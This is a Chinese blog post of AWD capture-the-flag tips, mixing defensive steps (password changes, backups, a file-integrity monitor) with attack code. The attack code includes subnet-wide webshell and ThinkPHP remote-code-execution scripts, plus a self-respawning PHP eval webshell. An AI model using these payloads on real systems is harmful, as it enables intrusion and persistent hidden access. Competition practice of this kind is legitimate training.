<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT">










<meta name="description" content="AWD附上AWD基操 1、确定环境是密码登录还是密钥登录密钥登录：（比赛方会提供如下三个文件） id_rsa id_rsa.pub token.txt 文件导入即可 若为密码登录，则看密码是否为随机的哈希值，并推测全场密码是否一样，若一样则首先需要修改密码，避免对方写批量遍历脚本，遍历所有服务器，当可以登录时，就瞬间修改你的机子，然后你就什么都做不了，服务器都落到对方手中，除非重置机子。 修改密码">
<meta property="og:type" content="article">
<meta property="og:title" content="V&#39;s blog">
<meta property="og:url" content="http://yoursite.com/2019/07/28/AWD/index.html">
<meta property="og:site_name" content="V&#39;s blog">
<meta property="og:description" content="AWD附上AWD基操 1、确定环境是密码登录还是密钥登录密钥登录：（比赛方会提供如下三个文件） id_rsa id_rsa.pub token.txt 文件导入即可 若为密码登录，则看密码是否为随机的哈希值，并推测全场密码是否一样，若一样则首先需要修改密码，避免对方写批量遍历脚本，遍历所有服务器，当可以登录时，就瞬间修改你的机子，然后你就什么都做不了，服务器都落到对方手中，除非重置机子。 修改密码">
<meta property="og:locale" content="zh-Hans">
<meta property="og:updated_time" content="2019-07-24T01:29:09.597Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="V&#39;s blog">
<meta name="twitter:description" content="AWD附上AWD基操 1、确定环境是密码登录还是密钥登录密钥登录：（比赛方会提供如下三个文件） id_rsa id_rsa.pub token.txt 文件导入即可 若为密码登录，则看密码是否为随机的哈希值，并推测全场密码是否一样，若一样则首先需要修改密码，避免对方写批量遍历脚本，遍历所有服务器，当可以登录时，就瞬间修改你的机子，然后你就什么都做不了，服务器都落到对方手中，除非重置机子。 修改密码">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2019/07/28/AWD/">





  <title> | V's blog</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">V's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/07/28/AWD/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="V">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="V's blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline"></h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-07-28T22:41:08+08:00">
                2019-07-28
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h3 id="AWD"><a href="#AWD" class="headerlink" title="AWD"></a>AWD</h3><p>附上AWD基操</p>
<h4 id="1、确定环境是密码登录还是密钥登录"><a href="#1、确定环境是密码登录还是密钥登录" class="headerlink" title="1、确定环境是密码登录还是密钥登录"></a>1、确定环境是密码登录还是密钥登录</h4><p>密钥登录：（比赛方会提供如下三个文件）</p>
<p>id_rsa</p>
<p>id_rsa.pub</p>
<p>token.txt</p>
<p>文件导入即可</p>
<p>若为密码登录，则看密码是否为随机的哈希值，并推测全场密码是否一样，若一样则首先需要修改密码，避免对方写批量遍历脚本，遍历所有服务器，当可以登录时，就瞬间修改你的机子，然后你就什么都做不了，服务器都落到对方手中，除非重置机子。</p>
<p>修改密码：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">passwd 用户名    //linux命令</span><br><span class="line"></span><br><span class="line">​					passwd ubuntu sudo passwd root   //ubuntu命令： </span><br><span class="line"></span><br><span class="line">​					w   //查看当前登录的用户 </span><br><span class="line"></span><br><span class="line">​					kill -kill -t 用户的tty   //踢掉当前登录的用户</span><br></pre></td></tr></table></figure>

<h4 id="2、迅速备份源码和数据库到本机"><a href="#2、迅速备份源码和数据库到本机" class="headerlink" title="2、迅速备份源码和数据库到本机"></a>2、迅速备份源码和数据库到本机</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">//这里假定web目录为/var/www/html</span><br><span class="line">mkdir -p ~/beifen</span><br><span class="line">cp -ra /var/www/html/. ~/beifen</span><br><span class="line">其中~代表用户的家目录，-r是递归，-a是保留原来文件属性， .是代表所有文件（不用*，因为*无法表示所有文件）</span><br></pre></td></tr></table></figure>

<p>定时备份源码：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#!/bin/bash</span></span><br><span class="line"><span class="keyword">while</span> [ 1 ]</span><br><span class="line"><span class="keyword">do</span></span><br><span class="line">time=`/bin/date +%H-%M-%S`</span><br><span class="line">bak_file=<span class="string">"/var/www/<span class="variable">$time</span>.tar.gz"</span></span><br><span class="line">webdir=<span class="string">"/var/www/html"</span></span><br><span class="line">tar zcvf <span class="variable">$bak_file</span> <span class="variable">$webdir</span> &gt;/dev/null 2&gt;&amp;1 &amp;</span><br><span class="line">sleep 60                               //一分钟备份一次</span><br><span class="line"><span class="keyword">done</span></span><br></pre></td></tr></table></figure>

<h4 id="3、找配置文件-amp-mysql一些操作"><a href="#3、找配置文件-amp-mysql一些操作" class="headerlink" title="3、找配置文件&amp;mysql一些操作"></a>3、找配置文件&amp;mysql一些操作</h4><p>找配置文件，找文件名有con、config、db字样的。在刚才备份的文件那里可以使用linux命令</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">find . -name &apos;*name*&apos;</span><br></pre></td></tr></table></figure>

<p>找到这些文件后，最主要找一些账号密码，例如mysql账号密码，如果找到了，自己可以修改自己服务器上的mysql密码，命令如下：（先自己登陆进去）</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; use mysql;</span><br><span class="line">mysql&gt; update user set password=PASSWORD(&quot;新的密码&quot;) where user=&apos;root&apos;; </span><br><span class="line">mysql&gt; flush privileges; (刷新)</span><br><span class="line">mysql&gt; exit</span><br></pre></td></tr></table></figure>

<p>记得修改了mysql密码后，还要把刚才找到的配置文件的密码给修改了，不然你的web服务就会不正常。</p>
<p>得到mysql密码，一般来说你就可以看看你自己mysql数据库里的数据，一般来说别人的数据库记录也是如此，所以别人一些后台账号密码，你都可以找到的（如果里面入库是不经过哈希处理的）</p>
<p>另外，也多注意有什么别的配置文件。</p>
<p>备份数据库</p>
<p>​        </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">//mysql备份指定数据库 </span><br><span class="line">mysqldump -u 用户名 -p 密码 数据库名 &gt; back.sql </span><br><span class="line">//mysql备份所有数据库 </span><br><span class="line">mysqldump --all-databases &gt; bak.sql </span><br><span class="line">//还原mysql数据库 </span><br><span class="line">mysql -u 用户名 -p 密码 数据库名 &lt; bak.sql</span><br></pre></td></tr></table></figure>

<p>D盾查杀，然后利用</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">#coding=utf-8</span><br><span class="line">import requests</span><br><span class="line">url_head=&quot;http://xxx.xx.xxx.&quot;	#网段</span><br><span class="line">url=&quot;&quot;</span><br><span class="line">shell_addr=&quot;/Upload/index.php&quot;</span><br><span class="line">【passwd=&quot;xxxxx&quot;】					#木马密码</span><br><span class="line">port=&quot;80&quot;</span><br><span class="line">【payload =  &#123;passwd: &apos;system(\&apos;cat /flag\&apos;);&apos;&#125;】</span><br><span class="line"></span><br><span class="line">webshelllist=open(&quot;webshelllist.txt&quot;,&quot;w&quot;)</span><br><span class="line">flag=open(&quot;firstround_flag.txt&quot;,&quot;w&quot;)</span><br><span class="line"></span><br><span class="line">for i in range(30,61):</span><br><span class="line">	url=url_head+str(i)+&quot;:&quot;+port+shell_addr</span><br><span class="line">	try:</span><br><span class="line">		res=requests.post(url,payload,timeout=1)</span><br><span class="line">		if res.status_code == requests.codes.ok:</span><br><span class="line">			result = url+&quot; connect shell sucess,flag is &quot;+res.text</span><br><span class="line">			print result</span><br><span class="line">			print &gt;&gt;flag,result</span><br><span class="line">			print &gt;&gt;webshelllist,url+&quot;,&quot;+passwd</span><br><span class="line">		else:</span><br><span class="line">			print &quot;shell 404&quot;</span><br><span class="line">	except:</span><br><span class="line">		print url+&quot; connect shell fail&quot;</span><br><span class="line"></span><br><span class="line">webshelllist.close()</span><br><span class="line">flag.close()</span><br></pre></td></tr></table></figure>

<p>第二步，上waf</p>
<p>初始部署，deployeerything.py一把梭</p>
<p>第三步，批量割韭菜，批量flag的提交。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line"></span><br><span class="line">def readWebcamera(ip=&quot;&quot;):</span><br><span class="line">    try:</span><br><span class="line">        res = requests.get(&apos;http://&apos; + ip + &apos;/index?s=index/think%5Capp/invokefunction&amp;function=call_user_func_array&amp;vars[0]=system&amp;vars[1][]=cat%20/flag.txt&apos;)</span><br><span class="line">        #passwd=&quot;xxxxx&quot;</span><br><span class="line">        #url=&apos;http://&apos; + ip + &apos;/Upload/index.php</span><br><span class="line">        #payload =  &#123;passwd: &apos;system(\&apos;cat /flag\&apos;);&apos;&#125;</span><br><span class="line">        #res=requests.post(url,payload,timeout=1)</span><br><span class="line">        if res.status_code == requests.codes.ok: </span><br><span class="line">            print(ip,end=&quot;:&quot;)</span><br><span class="line">            print(res.text)</span><br><span class="line">            #sub = requests.post(&apos;http://192.168.4.1&apos;,data=&#123;&apos;ip&apos;:ip,&apos;flag&apos;=res.text&#125;)</span><br><span class="line">    except:</span><br><span class="line">        pass</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">for i in range(101, 119):</span><br><span class="line">    readWebcamera(&quot;172.20.&quot; + str(i) + &quot;.102&quot;)</span><br></pre></td></tr></table></figure>

<h3 id="附加"><a href="#附加" class="headerlink" title="附加"></a>附加</h3><p>不死马</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">	set_time_limit(0);</span><br><span class="line">	ignore_user_abort(1);</span><br><span class="line">	unlink(__FILE__);</span><br><span class="line">	while(1)&#123;</span><br><span class="line">		file_put_contents(&apos;./.config.php&apos;, &apos;&lt;?php eval($_POST[&apos;cmd&apos;]);?&gt;&apos;);</span><br><span class="line">		system(&apos;chmod 777 .config.php&apos;);					</span><br><span class="line">		//持续在config.php中写入</span><br><span class="line">		touch(&quot;./.config.php&quot;, mktime(20,15,1,11,17,2017));	</span><br><span class="line">		usleep(100);</span><br><span class="line">	&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>文件监控</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br></pre></td><td class="code"><pre><span class="line"># -*- coding: utf-8 -*-</span><br><span class="line">#use: python file_check.py ./</span><br><span class="line"></span><br><span class="line">import os</span><br><span class="line">import hashlib</span><br><span class="line">import shutil</span><br><span class="line">import ntpath</span><br><span class="line">import time</span><br><span class="line"></span><br><span class="line">CWD = os.getcwd()</span><br><span class="line">FILE_MD5_DICT = &#123;&#125;      # 文件MD5字典</span><br><span class="line">ORIGIN_FILE_LIST = []</span><br><span class="line"></span><br><span class="line"># 特殊文件路径字符串</span><br><span class="line">Special_path_str = &apos;drops_JWI96TY7ZKNMQPDRUOSG0FLH41A3C5EXVB82&apos;</span><br><span class="line">bakstring = &apos;bak_EAR1IBM0JT9HZ75WU4Y3Q8KLPCX26NDFOGVS&apos;</span><br><span class="line">logstring = &apos;log_WMY4RVTLAJFB28960SC3KZX7EUP1IHOQN5GD&apos;</span><br><span class="line">webshellstring = &apos;webshell_WMY4RVTLAJFB28960SC3KZX7EUP1IHOQN5GD&apos;</span><br><span class="line">difffile = &apos;diff_UMTGPJO17F82K35Z0LEDA6QB9WH4IYRXVSCN&apos;</span><br><span class="line"></span><br><span class="line">Special_string = &apos;drops_log&apos;  # 免死金牌</span><br><span class="line">UNICODE_ENCODING = &quot;utf-8&quot;</span><br><span class="line">INVALID_UNICODE_CHAR_FORMAT = r&quot;\?%02x&quot;</span><br><span class="line"></span><br><span class="line"># 文件路径字典</span><br><span class="line">spec_base_path = os.path.realpath(os.path.join(CWD, Special_path_str))</span><br><span class="line">Special_path = &#123;</span><br><span class="line">    &apos;bak&apos; : os.path.realpath(os.path.join(spec_base_path, bakstring)),</span><br><span class="line">    &apos;log&apos; : os.path.realpath(os.path.join(spec_base_path, logstring)),</span><br><span class="line">    &apos;webshell&apos; : os.path.realpath(os.path.join(spec_base_path, webshellstring)),</span><br><span class="line">    &apos;difffile&apos; : os.path.realpath(os.path.join(spec_base_path, difffile)),</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">def isListLike(value):</span><br><span class="line">    return isinstance(value, (list, tuple, set))</span><br><span class="line"></span><br><span class="line"># 获取Unicode编码</span><br><span class="line">def getUnicode(value, encoding=None, noneToNull=False):</span><br><span class="line"></span><br><span class="line">    if noneToNull and value is None:</span><br><span class="line">        return NULL</span><br><span class="line"></span><br><span class="line">    if isListLike(value):</span><br><span class="line">        value = list(getUnicode(_, encoding, noneToNull) for _ in value)</span><br><span class="line">        return value</span><br><span class="line"></span><br><span class="line">    if isinstance(value, unicode):</span><br><span class="line">        return value</span><br><span class="line">    elif isinstance(value, basestring):</span><br><span class="line">        while True:</span><br><span class="line">            try:</span><br><span class="line">                return unicode(value, encoding or UNICODE_ENCODING)</span><br><span class="line">            except UnicodeDecodeError, ex:</span><br><span class="line">                try:</span><br><span class="line">                    return unicode(value, UNICODE_ENCODING)</span><br><span class="line">                except:</span><br><span class="line">                    value = value[:ex.start] + &quot;&quot;.join(INVALID_UNICODE_CHAR_FORMAT % ord(_) for _ in value[ex.start:ex.end]) + value[ex.end:]</span><br><span class="line">    else:</span><br><span class="line">        try:</span><br><span class="line">            return unicode(value)</span><br><span class="line">        except UnicodeDecodeError:</span><br><span class="line">            return unicode(str(value), errors=&quot;ignore&quot;)</span><br><span class="line"></span><br><span class="line"># 目录创建</span><br><span class="line">def mkdir_p(path):</span><br><span class="line">    import errno</span><br><span class="line">    try:</span><br><span class="line">        os.makedirs(path)</span><br><span class="line">    except OSError as exc:</span><br><span class="line">        if exc.errno == errno.EEXIST and os.path.isdir(path):</span><br><span class="line">            pass</span><br><span class="line">        else: raise</span><br><span class="line"></span><br><span class="line"># 获取当前所有文件路径</span><br><span class="line">def getfilelist(cwd):</span><br><span class="line">    filelist = []</span><br><span class="line">    for root,subdirs, files in os.walk(cwd):</span><br><span class="line">        for filepath in files:</span><br><span class="line">            originalfile = os.path.join(root, filepath)</span><br><span class="line">            if Special_path_str not in originalfile:</span><br><span class="line">                filelist.append(originalfile)</span><br><span class="line">    return filelist</span><br><span class="line"></span><br><span class="line"># 计算机文件MD5值</span><br><span class="line">def calcMD5(filepath):</span><br><span class="line">    try:</span><br><span class="line">        with open(filepath,&apos;rb&apos;) as f:</span><br><span class="line">            md5obj = hashlib.md5()</span><br><span class="line">            md5obj.update(f.read())</span><br><span class="line">            hash = md5obj.hexdigest()</span><br><span class="line">            return hash</span><br><span class="line">    except Exception, e:</span><br><span class="line">        print u&apos;[!] getmd5_error : &apos; + getUnicode(filepath)</span><br><span class="line">        print getUnicode(e)</span><br><span class="line">        try:</span><br><span class="line">            ORIGIN_FILE_LIST.remove(filepath)</span><br><span class="line">            FILE_MD5_DICT.pop(filepath, None)</span><br><span class="line">        except KeyError, e:</span><br><span class="line">            pass</span><br><span class="line"></span><br><span class="line"># 获取所有文件MD5</span><br><span class="line">def getfilemd5dict(filelist = []):</span><br><span class="line">    filemd5dict = &#123;&#125;</span><br><span class="line">    for ori_file in filelist:</span><br><span class="line">        if Special_path_str not in ori_file:</span><br><span class="line">            md5 = calcMD5(os.path.realpath(ori_file))</span><br><span class="line">            if md5:</span><br><span class="line">                filemd5dict[ori_file] = md5</span><br><span class="line">    return filemd5dict</span><br><span class="line"></span><br><span class="line"># 备份所有文件</span><br><span class="line">def backup_file(filelist=[]):</span><br><span class="line">    # if len(os.listdir(Special_path[&apos;bak&apos;])) == 0:</span><br><span class="line">    for filepath in filelist:</span><br><span class="line">        if Special_path_str not in filepath:</span><br><span class="line">            shutil.copy2(filepath, Special_path[&apos;bak&apos;])</span><br><span class="line"></span><br><span class="line">if __name__ == &apos;__main__&apos;:</span><br><span class="line">    print u&apos;---------start------------&apos;</span><br><span class="line">    for value in Special_path:</span><br><span class="line">        mkdir_p(Special_path[value])</span><br><span class="line">    # 获取所有文件路径，并获取所有文件的MD5，同时备份所有文件</span><br><span class="line">    ORIGIN_FILE_LIST = getfilelist(CWD)</span><br><span class="line">    FILE_MD5_DICT = getfilemd5dict(ORIGIN_FILE_LIST)</span><br><span class="line">    backup_file(ORIGIN_FILE_LIST) # TODO 备份文件可能会产生重名BUG</span><br><span class="line">    print u&apos;[*] pre work end!&apos;</span><br><span class="line">    while True:</span><br><span class="line">        file_list = getfilelist(CWD)</span><br><span class="line">        # 移除新上传文件</span><br><span class="line">        diff_file_list = list(set(file_list) ^ set(ORIGIN_FILE_LIST))</span><br><span class="line">        if len(diff_file_list) != 0:</span><br><span class="line">            # import pdb;pdb.set_trace()</span><br><span class="line">            for filepath in diff_file_list:</span><br><span class="line">                try:</span><br><span class="line">                    f = open(filepath, &apos;r&apos;).read()</span><br><span class="line">                except Exception, e:</span><br><span class="line">                    break</span><br><span class="line">                if Special_string not in f:</span><br><span class="line">                    try:</span><br><span class="line">                        print u&apos;[*] webshell find : &apos; + getUnicode(filepath)</span><br><span class="line">                        shutil.move(filepath, os.path.join(Special_path[&apos;webshell&apos;], ntpath.basename(filepath) + &apos;.txt&apos;))</span><br><span class="line">                    except Exception as e:</span><br><span class="line">                        print u&apos;[!] move webshell error, &quot;%s&quot; maybe is webshell.&apos;%getUnicode(filepath)</span><br><span class="line">                    try:</span><br><span class="line">                        f = open(os.path.join(Special_path[&apos;log&apos;], &apos;log.txt&apos;), &apos;a&apos;)</span><br><span class="line">                        f.write(&apos;newfile: &apos; + getUnicode(filepath) + &apos; : &apos; + str(time.ctime()) + &apos;\n&apos;)</span><br><span class="line">                        f.close()</span><br><span class="line">                    except Exception as e:</span><br><span class="line">                        print u&apos;[-] log error : file move error: &apos; + getUnicode(e)</span><br><span class="line"></span><br><span class="line">        # 防止任意文件被修改,还原被修改文件</span><br><span class="line">        md5_dict = getfilemd5dict(ORIGIN_FILE_LIST)</span><br><span class="line">        for filekey in md5_dict:</span><br><span class="line">            if md5_dict[filekey] != FILE_MD5_DICT[filekey]:</span><br><span class="line">                try:</span><br><span class="line">                    f = open(filekey, &apos;r&apos;).read()</span><br><span class="line">                except Exception, e:</span><br><span class="line">                    break</span><br><span class="line">                if Special_string not in f:</span><br><span class="line">                    try:</span><br><span class="line">                        print u&apos;[*] file had be change : &apos; + getUnicode(filekey)</span><br><span class="line">                        shutil.move(filekey, os.path.join(Special_path[&apos;difffile&apos;], ntpath.basename(filekey) + &apos;.txt&apos;))</span><br><span class="line">                        shutil.move(os.path.join(Special_path[&apos;bak&apos;], ntpath.basename(filekey)), filekey)</span><br><span class="line">                    except Exception as e:</span><br><span class="line">                        print u&apos;[!] move webshell error, &quot;%s&quot; maybe is webshell.&apos;%getUnicode(filekey)</span><br><span class="line">                    try:</span><br><span class="line">                        f = open(os.path.join(Special_path[&apos;log&apos;], &apos;log.txt&apos;), &apos;a&apos;)</span><br><span class="line">                        f.write(&apos;diff_file: &apos; + getUnicode(filekey) + &apos; : &apos; + getUnicode(time.ctime()) + &apos;\n&apos;)</span><br><span class="line">                        f.close()</span><br><span class="line">                    except Exception as e:</span><br><span class="line">                        print u&apos;[-] log error : done_diff: &apos; + getUnicode(filekey)</span><br><span class="line">                        pass</span><br><span class="line">        time.sleep(2)</span><br><span class="line">        # print &apos;[*] &apos; + getUnicode(time.ctime())</span><br></pre></td></tr></table></figure>


      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/07/22/nmap/" rel="next" title="nmap">
                <i class="fa fa-chevron-left"></i> nmap
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

